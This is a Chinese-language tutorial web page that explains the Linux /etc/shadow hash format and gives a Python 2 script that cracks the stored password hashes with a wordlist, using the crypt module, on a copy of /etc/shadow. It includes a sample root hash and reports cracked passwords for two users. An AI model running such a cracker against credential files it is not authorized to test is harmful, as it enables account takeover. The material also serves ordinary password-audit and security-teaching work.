脚本之家 服务器常用软件
快捷导航
您的位置:首页脚本专栏python → python破解linux密码

Python脚本激活Linux密码的方法(crypt模块)

 更新时间:2021年05月25日 11:09:24   作者:谢公子  
今天小编给大家分享一个非常不错的方法破解linux口令,主要是利用linux系统中的crypt模块模拟了linux系统中用户密码的加密,操作也很方便,对python破解linux口令相关知识感兴趣的朋友跟随小编一起学习下吧

环境 Kali Linux ,python版本2.7.13 。

我们利用Linux系统中的 crypt 模块模拟了Linux系统中用户密码的加密,在Windows中是不存在这个库的。

在Linux系统中,用户的密码被加密存储在了 /etc/shadow 文件中。

如下是 /etc/shadow中root用户的字段

root:$6$ql1UU7ZPwONL9NzX$/bz0GQ8.Ne.zqpF.L5rqPok.Zep0ypRU1X8v.Omrqnv1k6hVDzqTS1Vezencaxltk52X94eZMT/teVHI1Jwf6.:17767:0:99999:7:::

第二个字段是密码部分的,我们把它单独拿出来

$6$ql1UU7ZPwONL9NzX$/bz0GQ8.Ne.zqpF.L5rqPok.Zep0ypRU1X8v.Omrqnv1k6hVDzqTS1Vezencaxltk52X94eZMT/teVHI1Jwf6.

密码部分的格式为:$id$salt$encrypted  

  • id是指用的哈希算法,id为1是MD5,id为5是SHA-256,id为6是SHA-512
  • salt 为盐值
  • encrypted 为hash值,这里的hash值是密码和盐值一起加密之后得到的

在了解了shadow 文件中密码的加密方式之后,我们就可以开始编写python脚本了。

在编写之前,我们需要准备好密码字典文件 key.txt 。只有当密码字典足够大时,才有可能破解出密码。

然后我们将 /etc/shadow 文件复制到python脚本所在目录,修改文件名为 shadow.txt

在编写时,我们创建两个函数:main() 和 testPass() 。main() 函数打开 shadow.txt 文件中的内容,读取其中的用户名字段和密码字段cryptPass。testPass() 函数将密码字段中的 $id$salt 提取出来赋值给 salt 。然后读取 key.txt 中的密码字段,赋值给 word 。再利用Linux系统中python的一个crypt库,将word和salt一起作为参数传进去进行加密,得到 cryptWord 。最后将cryptWord和cryptPass进行对比,如果相等,则这个word就是该用户的密码,否则不是。

# -*- coding: utf-8 -*-
"""
Created on Mon Oct 29 15:01:54 2018
@author: 小谢
"""
import crypt   ##导入Linux口令加密库
def testPass(cryptPass):
    salt=cryptPass[cryptPass.find("$"):cryptPass.rfind("$")]  ##获得盐值,包含$id部分
    dictFile=open('key.txt','r')
    for word in dictFile.readlines():
        word=word.strip("\n")
        cryptWord=crypt.crypt(word,salt)                   ##将密码字典中的值和盐值一起加密
        if (cryptWord==cryptPass):                           ##判断加密后的数据和密码字段是否相等
            print "[+]Found Password:"+word+"\n"       ##如果相等则打印出来
            return 
    print "[-] Password Not Found.\n"
    return 
 
def main():
    passFile=open('shadow.txt')
    for line in passFile.readlines():      ##读取文件中的所有内容
        if ":" in line:
            user=line.split(":")[0]                     ##获得用户名
            cryptPass=line.split(":")[1].strip(' ')   ##获得密码字段
            print "[*] Cracking Password for:"+user
            testPass(cryptPass)
main()

脚本运行截图,破解出了用户tom和用户xie的密码。 

以上就是Python脚本激活Linux口令(crypt模块)的详细内容,更多关于python破解linux口令的资料请关注脚本之家其它相关文章!

您可能感兴趣的文章:

相关文章

  • Python实现上下文管理器的示例代码

    Python实现上下文管理器的示例代码

    这篇文章主要为大家详细介绍了Python中实现上下文管理器的具体方法,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起了解一下
    2023-07-07
  • Python中的axis参数的具体使用

    Python中的axis参数的具体使用

    在我们使用Python中的Numpy和Pandas进行数据分析的时候,经常会遇到axis参数,本文就来介绍一下axis参数的具体使用,感兴趣的可以了解一下
    2021-12-12
  • Python爬取百度地图POI数据代码的步骤

    Python爬取百度地图POI数据代码的步骤

    爬取百度地图的POI数据涉及法律和道德问题,因为这类数据受到版权保护,且大多数在线地图服务都有严格的反爬虫措施,这篇文章主要介绍了Python爬取百度地图POI数据代码,需要的朋友可以参考下
    2024-08-08
  • SageMath与Python的使用示例教程

    SageMath与Python的使用示例教程

    SageMath是一个开源的数学软件,它可以与Python进行交互,本文通过实例代码介绍了SageMath与Python的使用,需要的朋友可以参考下
    2024-03-03
  • Flask-SocketIO服务端安装及使用代码示例

    Flask-SocketIO服务端安装及使用代码示例

    这篇文章主要介绍了Flask-SocketIO服务端安装及使用代码示例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
    2020-11-11
  • python如何通过psutil获取服务器cpu、内存、磁盘使用率

    python如何通过psutil获取服务器cpu、内存、磁盘使用率

    这篇文章主要介绍了python通过psutil获取服务器cpu,内存,磁盘使用率,使用psutil,可以很方便地监控系统的运行状况,诊断问题和优化性能,需要的朋友可以参考下
    2023-04-04
  • python实战游戏之史上最难最虐的扫雷游戏没有之一

    python实战游戏之史上最难最虐的扫雷游戏没有之一

    这篇文章主要介绍了使用 python 实现扫雷游戏,不同于传统过时的扫雷,今天我们用 Python 增加了新花样,文中给大家介绍的非常详细,需要的朋友可以参考下
    2021-09-09
  • python 自动轨迹绘制的实例代码

    python 自动轨迹绘制的实例代码

    今天小编就为大家分享一篇python 自动轨迹绘制的实例代码,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2019-07-07
  • python redis 删除key脚本的实例

    python redis 删除key脚本的实例

    今天小编就为大家分享一篇python redis 删除key脚本的实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2019-02-02
  • Python响应对象text属性乱码解决方案

    Python响应对象text属性乱码解决方案

    这篇文章主要介绍了Python响应对象text属性乱码解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
    2020-03-03

最新评论